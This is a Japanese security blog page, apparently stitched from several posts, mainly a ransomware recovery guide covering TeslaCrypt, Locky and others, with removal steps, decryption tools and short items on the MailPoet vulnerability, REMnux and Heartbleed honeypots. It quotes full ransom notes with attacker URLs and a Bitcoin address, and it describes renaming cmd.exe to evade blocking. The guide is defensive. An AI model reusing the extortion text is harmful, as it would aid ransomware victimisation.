俺は君に人を傷付けるのではなく人を助ける人間になってほしい    
僕は君の20年後を見ている

      

③ TeslaCrypt (CrypTesla)

TeslaCrypt ウイルスはバージョンによって暗号化されたファイルに付加される拡張子名が異なります。拡張子名には「.aaa, .abc, .ccc, .ecc, .exx, ezz, .micro, .mp3, .ttt, .vvv, .xxx, .xyz, .zzz.」などになります。 拡張子名として .ecc, .exx, .ezz, .vvv が付加されるバージョンに関しては、暗号化されたファイルを復旧(復号)するTeslaDecoder というツールがリリースされています。


2016年5月中旬になって開発者が TeslaCrypt プロジェクトを終了、復号用のマスターキーを公開しました。
      

TeslaCrypt に、公開されたマスターキー「440A241DD80FCC5664E861989DB716E08CE627D8D40C7EA360AE855C727A49EE」を    
設定することで、身代金を払わずにファイルを復号できるようになりました。

TeslaDecoder は下記URL からダウンロードすることが出来ます。 http://download.bleepingcomputer.com/BloodDolly/TeslaDecoder.zip   
http://download.bleepingcomputer.com/BloodDolly/changelog.txt  

また、拡張子名が .vvv となるバージョンで暗号化されたファイルを復号する方法は、 下記を参照してください。

TeslaCrypt (vvvウイルス) で暗号化されたファイルの復元方法

http://rootdown.cocolog-nifty.com/memo/2016/01/cryptesla-vvv-6.html

  • TelaCrypt2 (vvv ウイルス)の脅迫文

---!!!==============================================================!!!!=========- 

What happened to your files ? All of your files were protected by a strong encryption with RSA-2048. More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) What does this mean ? This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them. How did this happen ? Especially for you, on our server was generated the secret key pair RSA-2048 - public and private. All your files were encrypted with the public key, which has been transferred to your computer via the Internet. ---!!!!=================================================!!!!========= Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BTC NOW, and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://rbtc23drs.7hdg13udd.com/7C66B96138xxxxxx 2. http://tsbfdsv.extr6mchf.com/7C66B96138xxxxxx 3. https://alcov44uvcwkrend.onion.to/7C66B96138xxxxxx If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization. 3. Type in the address bar: alcov44uvcwkrend.onion/7C66B96138xxxxxx 4. Follow the instructions on the site.IMPORTANT INFORMATION: Your personal pages:http://rbtc23drs.7hdg13udd.com/7C66B96138xxxxxx http://tsbfdsv.extr6mchf.com/7C66B96138xxxxxx https://alcov44uvcwkrend.onion.to/7C66B96138xxxxxx Your personal page (using TOR-Browser): alcov44uvcwkrend.onion/7C66B96138xxxxxx Your personal identification number (if you open the site (or TOR-Browser's) directly): 7C66B96138xxxxxx ---!!!===================================================!!!!=========  

  • TeslaCrypt (拡張子ECC)の脅迫文

脅迫 All your documents, photos, databases and other important files have been encrypted with strongest encryption RSA-2048 key, generated for this computer.

Private decryption key is stored on a secret Internet server and nobody can decrypt your files until you pay and obtain the private key.    
If you see the main encryptor red window, examine it and follow the instructions.    
Otherwise, it seems that you or your antivirus deleted the encryptor program.    
Now you have the last chance to decrypt your files.    
Open http://tkj3higtqlvohsxx.aw49f4j3nxx.com or http://tk3higtqlvohsxx.dfj3d8w3nxx.com, https://tkj3higtqlvohsxx.s5.tor-gateways.de/ in your browser.    
They are public gates to the secret server.    
Copy and paste the following Bitcoin address in the input from on server. Avoid missprints.
19i4AsfxqRivqw95Cb8RExxxxxxxxxxxxxxx&#
Follow the instructions on the server.

日本語訳(Google 翻訳)

すべてのドキュメント、写真、データベース、およびその他の重要なファイルは、このコンピュータ用に生成最も強力な暗号化RSA- 2048キーで暗号化されています。

秘密復号鍵は秘密のインターネットサーバーに格納されている、あなたが支払うと秘密鍵を取得するまで、誰もあなたのファイルを復号化することはできません。


あなたがメインの暗号化赤ウィンドウが表示された場合、それを確認し、指示に従ってください。    
それ以外の場合は、あなたやあなたのアンチウイルスは、暗号化プログラムを削除しているようです。
今、あなたはあなたのファイルを復号化するための最後のチャンスを持っています。    
お使いのブラウザでhttp://tkj3higtqlvohsxx.aw49f4j3nxx.comまたはhttp: //tk3higtqlvohsxx.dfj3d8w3nxx.com 、 https://tkj3higtqlvohsxx.s5.tor-gateways.de/を開きます。    
彼らは秘密のサーバーにパブリックゲートです。    
コピーし、サーバー上からの入力で、次のビットコインのアドレスを貼り付けます。 missprintsを避けます。    
19i4AsfxqRivqw95Cb8RExxxxxxxxxxxxxxx
サーバー上の指示に従ってください。

      

④ CoinVault  

  暗号化されたファイルを復元(復号)するサイトが Kaspersky によって提供されています。    
noransom - https://noransom.kaspersky.com

法執行機関とセキュリティ企業が、CoinValut の指揮統制サーバー(C&Cサーバ)を確保し、そのサーバー内の情報からファイルを復号するツールを作成したそうです。

      

⑤ Cryptowall4 

  Cryptowall4 では、ファイル名も含めて暗号化する機能が追加されています。どのファイルが暗号化されたのか特定することも難しくなっています。

⑥ Linux.Encoder.1 (encrypted ウイルス) 

Linux を標的としたランサムウェア。特定ディレクトリやファイルタイプのファイルが暗号化されて身代金を請求される。多くのLinux Web サーバで被害が出ている。暗号化されたファイルは、拡張子が「encrypted」となります。

⑦ Locky ウイルス

暗号化したファイルの拡張子が Locky となるランサムウェアです。脅迫文が多言語対応になっていて、日本語Windows では日本語の脅迫文が生成表示されます。メール添付ファイルや改ざんされたWebサイト経由で感染します。Locky ウイルスの詳細については、下記URLで紹介しています。

Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

http://rootdown.cocolog-nifty.com/memo/2016/03/locky-virus---e.html 

 

3. ランサムウェアを停止する方法

ランサムウェアは自身が駆除されないように、アンチウイルスソフトやタスクマネージャ、コマンドプロンプトなどのプログラムを停止させる機能を持っています。この仕組みは、プログラム起動するとすぐに強制停止させるもので、プログラムは一瞬ですが実行することはできます。  

また、停止させるプログラムは、実行ファイル名で指定されていることが多く、プログラムのファイル名を変更することで強制停止されずに起動させることも可能な場合が多いです。

      

以下、実行ファイル名を変更したコマンドプロンプト cmd.exe を起動してtasklist、 taskkill を使ってランサムウェアを停止する方法です。

      

cryptolocker

      

(1) ランサムウェアの実行ファイル名の確認  

ディスクトップ上にあるランサムウェアのアイコン cryptolocker のプロンプトから、ランサムウェアのパスとファイル名を確認する。この例では以下のようになっていました。パスやファイル名は、感染PC毎に異なります。

C:\Documents and Settings\Admin\Application Data\bicjrya.exe

      

cryptolocker

(2) コマンドプロンプトのコピー

エクスプローラで cmd.exe (c:\windows\system32\cmd.exe) をコピーして、ファイル名を変更する。ここではディスクトップ上に cmd2.exe としてコピーする。

      

(3) コピーしたコマンドプロンプトの起動

(2) でコピーした cmd2.exe をダブルクリックして、コマンドプロンプトを起動する。Windows7 以降の場合は、ア右クリックで「管理者として実行」をクリックして起動する。

      

(4) tasklist で実行中プログラムの一覧取得  

(2) で起動したコマンドプロンプトで tasklist を実行し、実行中プログラム一覧を取得する。

  tasklist /FO LIST

(5) ランサムウェアのPID確認

(4) で取得した実行中プログラム一覧から、(1) で確認したランサムウェアの実行ファイル名と一致するイメージ名を探す。イメージ名の下にある PID の番号を確認する。  

イメージ名: bicjrya.exe
PID:
セッション名: Console
セッション#: 0
メモリ使用量: 11,848K

(6) taskkil でランサムウェアを停止する  

(5) で確認した PID を指定して taskkill を実行することで、ランサムウェアを停止させる。

taskkill /PID 1360 /F

(7) 終了

カウントダウンの表示が消えていれば、ランサムウェアが停止している状態になっています。消えない場合は、(6) を再度実行してみてください。

      

 

      

4. ランサムウェアを駆除する方法

(1) ランサムウェアの実行ファイルを削除

エクスプローラで 2. (1) で確認したランサムウェアを削除します

      

(2) ランダムウェアの自動起動設定を削除

レジストリエディタでも削除可能ですが、ここではマイクロソフトが提供している sysinternals suite に含まれる autoruns を使って、自動起動設定を削除します

https://technet.microsoft.com/ja-jp/sysinternals/bb963902.aspx

上記URLから autoruns をダウンロードして、autoruns.exe をダブルクリックすると   
autoruns が起動します。

 
autoruns の Filter に 2. (1) で確認したランサムウェアの実行ファイル名を入力します。入力が終わるとランサムウェアを実行するためのレジストリ設定が表示されます。

 
ここでは、「bicjrya.exe」を入力し、下記2つのレジストリが表示されました。

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msdedf    
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msdedf

      

すべてのレジストリのチェックボックスをオンにして、上部のバッテンマークを押すと、設定を削除することが出来ます。

cryptolocker

      

また、警告文を表示するための設定も削除します。   
同じく autoruns に HELP_RESTORE_FILE を入力すると、関連する設定が表示されます。すべてチェックボックスをオンにしてバッテンマークで削除します。

cryptolocker

さらに、背景の壁紙に表示されている警告メッセージは、壁紙設定から元に戻すことが出来ます。

      

5. ランサムウェアに暗号化されたファイルを復旧する方法

(1) 暗号化されたファイルの復号/復元ツール、サイト(Decrypt, Recovery Tool, Decoder 

  • TeslaCrypt2 (vvv ウイルス)によって暗号化されたファイルを復元するツール      

TeslaCrack https://github.com/Googulator/TeslaCrack

TeslaCrack を使った vvvウイルスによって暗号化されたファイルの詳しい復号手順については、下記URLに記載しています。 

        

TeslaCrypt (vvvウイルス) で暗号化されたファイルの復元方法http://rootdown.cocolog-nifty.com/memo/2016/01/cryptesla-vvv-6.html

     
  • TeslaCrypt (vvvウイルスではない) によって暗号化されたファイルを       
    復元するツールを提供しているサイト
     

暗号化されたファイルの拡張子は「ecc」、TeslaCrypt の亜種である AlphaCrypt では拡張子が「ezz」となっています。  

拡張子が「zzz」となるTeslaCrypt の亜種(vvvウイルス)による被害が、広告配信や改ざんされたWebサイト経由で広がっているようです。パッチが出ていない 0dayの脆弱性を狙った攻撃でなければ、Flash Player, Adobe Reader, Java, IE, Windows Update などを最新版にアップデートすることで感染を防ぐことができます。 

Threat Spotlight: TeslaCrypt – Decrypt It Yourself http://blogs.cisco.com/security/talos/teslacrypt

decryptor

No More Ransom!   https://www.nomoreransom.org/

ID Ransomware   https://id-ransomware.malwarehunterteam.com/

             

      

      

(2) ボリュームシャドーコピーから復旧

Windows Vista/7 以降ではボリュームシャドーコピーというサービス(Volume Shadow Copy Service: VSS)が提供されている。このサービスを使うことで誤って削除してしまったファイルや、上書きしてしまったファイルなどを復元することができる。 

(3) バックアップから復旧

      

6. 関連リンク

WordPress MailPoet プラグイン(wysija newsletters) に任意のファイルをアップロードできる深刻な脆弱性

WordPress MailPoet プラグイン(wysija newsletters) に任意のファイルをアップロードできる深刻な脆弱性

概要

2014年7月2日、Securi は自社の Blog において、170万件ダウンロードされている人気のニュース配信管理用 Wordpress プラグインである MailPoet プラグイン(wysija newsletters) に任意のファイルをアップロードできる脆弱性があることを公表した。

フィッシングサイト設置や WebShell などのプログラムファイルをアップロードされて Webサイト上で任意のコマンド実行などに悪用される可能性がある。(Webサーバの実行権限内で)

また、2014年7月23日、Securiは、自社のブログで数日前から MailPoet プラグインの脆弱性を悪用して数千の Wordpress サイトがハッキングされていると発表した。
ブログでは、攻撃者によって脆弱性を悪用して「content/uploads/wysija/themes/mailp」以下に悪意のあるテーマファイルを設置されて、サイト内のファイルにバックドアコードを挿入されてしまった事例を掲載している。

対策

7月1日に公開された MailPoet バージョン 2.6.7 では、この脆弱性が修正されている。

参考URL

マルウェア解析に特化した Linux ディストリビューション REMnux を使ってみた

マルウェア解析に特化した Linux ディストリビューション REMnux を使ってみた

                                   

このエントリーをはてなブックマークに追加

概要

REMnux は、マルウェア解析やリバースエンジニアリングに必要なツールがあらかじめインストールされたLinux ディストリビューションです。仮想マシン(OVA)形式や Docker などで提供されています。仮想マシン(OVA)形式をダウンロードし、VMwareやVirtualBox などにインポートするだけで、すぐにマルウェア解析やリバースエンジニアリングの環境が整うので非常に便利です。

Linux のディストリビューションですが、Windowsの実行ファイル形式やドキュメント形式(Word, Excel, PowerPointなど)などのマルウェアも解析することが可能です。また、JavaScript や Java, Adobe Flash SWF, PDF などの解析ソフトウェアも入っています。

また、疑似インターネット環境を作るためのプログラム inetsim や honeyd などもインストールされているので、マルウェアを実際に動作させて挙動を解析する「マルウェア動的解析」を行う際の環境として非常に便利です。

inetsim は、HTTP/HTTPS WebサービスやDNSサービスなどのインターネットの主要なサービスをエミュレートしてくれるソフトウェアです。DNSサービスでは fakedns のように、名前解決に対してあらかじめ設定しておいたIPアドレスを回答することが出来ます。HTTPサービスでは、特定のURLにアクセスがあった場合に、あらかじめ設定しておいたHTMLファイルやEXE実行ファイルなどをレスポンスとして返すことが出来ます。他にも様々な便利なソフトウェアがインストールされています。

標準では日本語環境となっていないので、日本語キーボードや日本タイムゾーン、日本語入力などの設定をする必要があります。これらの設定方法についても紹介します。


REMnux のデフォルトユーザとパスワード

  • ユーザ       : REMnux
  • パスワード  : malware

スポンサーリンク

REMnux でマルウェアを解析する


※ この記事は現在作成中です(2015/5/13)

疑似インターネット環境の設定

実行ファイルの解析

PDFマルウェアの解析

JavaScript の難読化解除

関連記事

スポンサーリンク

Adobe Flash Playerの脆弱性「CVE-2014-0515」を悪用するウイルスに関する注意喚起

Adobe Flash Playerの脆弱性「CVE-2014-0515」を悪用するウイルスに関する注意喚起

概要

2014年5月21日、ESETは、Adobe Flash Player の脆弱性(CVE-2014-0515)を悪用するウイルスが日本国内で多く確認されたとして注意喚起を発表している。

Adobe Flash Player の脆弱性(CVE-2014-0515)が修正される4月28日以前から攻撃に悪用されていた。早急に最新バージョンにアップデートすることを推奨している。

4月末に修正された Adobe Flash Player の脆弱性を悪用するウイルス、日本で感染拡大 - INTERNET Watch
http://internet.watch.impress.co.jp/docs/news/20140521_649487.html

対策

Adobe Flash Player を最新バージョンにアップデート

Adobe Security Bulletin (APSB14-13)

http://helpx.adobe.com/security/products/flash-player/apsb14-13.html

関連URL

  • Adobe Flash Player の脆弱性対策について(APSB14-13)(CVE-2014-0515):IPA 独立行政法人 情報処理推進機構

    http://www.ipa.go.jp/security/ciadr/vul/20140430-adobeflashplayer.html

  • Flash Playerに存在するゼロデイ脆弱性「CVE-2014-0515」の解析 | トレンドマイクロ セキュリティ ブログ (ウイルス解析担当者による Trend Micro Security Blog)

    http://blog.trendmicro.co.jp/archives/9070

  • [No.0031] Adobe Flash Playerの脆弱性(CVE-2014-0515)を悪用した水飲み場型ゼロデイ攻撃にご注意ください

http://canon-its.jp/product/eset/sn/sn20140521.html

  • New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks - Securelist

無料ウイルスチェック(オンラインサイト)

無料ウイルスチェック(オンラインサイト)

少しでも不審なファイルや怪しいサイトがあったら、まずはオンラインの無料ウイルスチェックサイトでチェックすると何かわかるかも。ただし、アップロードしたファイルが、チェックサイト経由で提携会社(アンチウイルスベンダーや研究機関)に渡ってしまいます。また、チェック結果やチェックしたファイル名や URL も公開されてしまうので注意が必要です。


VirusTotal

  • ファイルをアップロードすると無料でウイルスチェックしてくれるサービス
  • 実行ファイルだけでなくネットワークキャプチャファイル、URL指定でもチェック可能
  • ハッシュ値から解析結果の検索なども可能
  • 2014年現在は Google が提供している

NetworkTotal

  • ネットワークキャプチャを無料でウイルスチェックしてくれるサービス
  • Suricataエンジンと EmergingThreats PRO Rules を使って検出

 

Google Malware Check Tool

  • 指定したURLやドメインの Google セーフブラウジングでの診断結果をレポート

CVE-2014-0160 OpenSSL Heartbleed bug Honeypot

CVE-2014-0160 OpenSSL Heartbleed バグ攻撃を捕捉するハニーポット

CVE-2014-0160 OpenSSL Heartbleed バグ攻撃を捕捉するハニーポットがリリースされました。Heartbleed バグについては、こちらを参照してください。

Heartbleed Honeypot Script ≈ Packet Storm

ハニーポットに OpenSSL Heartbleed バグを攻撃をすると、 攻撃元に対して「Hi there! Your scan has   been logged! Have no fear,  this is for research only --  We're never gonna give you up,  never gonna let you down!」というメッセージを返します。もちろん、メッセージは変更可能です。

hb-honey1

ハニーポット側には攻撃元のIP アドレス(127.0.0.1)が表示されます。

hb-honey2

ハニーポットのカスタマイズ例 :)

関連記事

【楽天ブックスなら送料無料】ハニ-ポット [ ランス・スピッツナ- ]

記事一覧

スポンサードリンク


Twitter


無料ブログはココログ

ブログ検索